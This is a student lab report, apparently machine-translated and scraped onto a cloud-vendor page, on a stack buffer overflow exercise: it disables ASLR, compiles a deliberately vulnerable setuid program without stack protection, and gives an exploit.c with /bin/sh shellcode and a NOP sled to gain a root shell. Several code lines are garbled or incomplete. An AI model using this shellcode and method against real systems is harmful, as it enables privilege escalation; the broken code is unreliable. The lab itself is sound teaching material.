Buffer overflow attack: by writing to the program's buffer beyond its length content, causing buffer overflow, thereby destroying the program's stack, causing the program to crash or to make the program to execute other instructions to achieve the purpose of the attack.
Experimental principle:In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode. Shellcode is the assembly code that holds the program.
Experimental steps:1. Turn off the address space randomization feature, making it easier to guess the initial address of the random heap (heap) and stacks (stack).
Use the command:
$ sudo sysctl -w kernel.randomize_va_space=0
2. Use another shell program (zsh) instead of/bin/bash to reproduce the situation before a buffer overflow attack and other attack protection measures using the shell program are implemented.
To set the ZSH program command:
$ sudo su$ cd /bin$ rm sh$ ln -s zsh sh$ exit
3, enter the LINUX32 bit environment, input "/bin/bash" use bash
$ linux32$ /bin/bash
4, in the/tmp directory to create a new stack.c file, the code is as follows
/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */#include <stdlib.h>#include <stdio.h>#include <string.h>int bof(char *str){ char buffer[12]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1;}int main(int argc, char **argv){ char str[517]; FILE *badfile;//定义文件指针 badfile = fopen("badfile", "r");//文件指针指向badfile fread(str, sizeof(char), 517, badfile);//从badfile中读取内容到str bof(str);//再把str中的内容复制到buffer中 printf("Returned Properly\n"); return 1;}
5, compile the program, and set the Set-uid
Linux setuid mechanism
(1) Which resources or files can be accessed while the process is running, and not depending on the owner of the process file, but rather on the uid/gid of the user who runs the command, to obtain various system resources as that identity.
(2) for a master root executable file, if the SUID bit is set, all other ordinary users will be able to run the file as root and obtain the appropriate system resources.
(3) It can be simply understood that a normal user has special permissions that can perform "only root permissions".
(4) The role of Setuid,setuid is to allow the user executing the command to execute the command owner's permission, such as ordinary user execution passwd will have root permissions, so you can modify/etc/passwd this file. It is marked as: S, where it appears in X, for example:-rwsr-xr-x. The setgid means that the user executing the file is executed with the permission of the group to which the file belongs.
(5) We know that/tmp is the temporary file directory of the system, all the users in the directory has all the permissions, that is, in this directory can be arbitrarily created, modify, delete files, if user A in this directory created a file, User B deleted the file, this situation we are not allowed. To achieve this, the concept of stick bit (sticky bit) is present. It is for the directory, if the directory is set stick bit (sticky bit), the file in addition to the file creator and root user can delete and modify the/tmp directory of stuff, other users cannot move others, this is the role of sticky bit.
--Referenced from Linux understanding Setuid (), setgid () and sticky bit
U represents the owner of the file, G means that the owner of the file belongs to the same group (group), and O indicates that the other person, a means that all three are.
--Quote from the chmod command detailed usage
Command:
$ sudo su$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c//–fno-stack-protector 关闭阻止缓冲区溢出的栈保护机制, -z execstack 用于允许执行栈。$ chmod u+s stack$ exit
6, in the/tmp directory to create a new exploit.c file, the code is as follows:
/* EXPLOIT.C *//* A program this creates a file containing code for launching shell*/#include <stdlib.h> #include < ;stdio.h> #include <string.h>char shellcode[] = "\x31\xc0"//xorl%eax,%eax "\x50"//PUSHL%eax "\x68 "//sh"//PUSHL $0x68732f2f "\x68" "/bin"//PUSHL $0x6e69622f "\x89\xe3"//movl%esp,%ebx "\x50"//PUSHL% EAX "\x53"//PUSHL%ebx "\x89\xe1"//movl%esp,%ecx "\x99"//CDQ "\xb0\x0b"//movb $0x0b,%al "\xcd\ x80 "//int $0x80; void Main (int argc, char **argv) {char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */memset (&buffer, 0x90, 517); /* need to fill the buffer with appropriate contents here */strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x?? \x?? \x?? \x?? "); Four bytes starting at a specific offset of buffer overwrite Sellcode address strcpy (buffer + shellcode); Copy shellcode to buffer with offset set to/* Save the CONtents to the file "badfile" */Badfile = fopen ("./badfile", "w"); fwrite (buffer, 517, 1, badfile); Fclose (badfile);}Command:
cd /tmpvi exploit.c
7, enter the command to get shellcode in memory address, set breakpoints, and then get the STR address.
$ gdb stack$ disass main
8, modify the Exploit.c file, Shellcode address is 0xffffd060 (hex) + 0x64 (100 hex) = 0XFFFFD0C4 (hex)
9, compile the EXPLOIT.C program:
$ gcc -m32 -o exploit exploit.c
10, first run the attack program exploit, and then run the vulnerability program stack, observe the results:
Through the attack, get root permission!
2018-2019-1 20165228 Experimental Report on buffer overflow vulnerability of the basic design of information security system
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
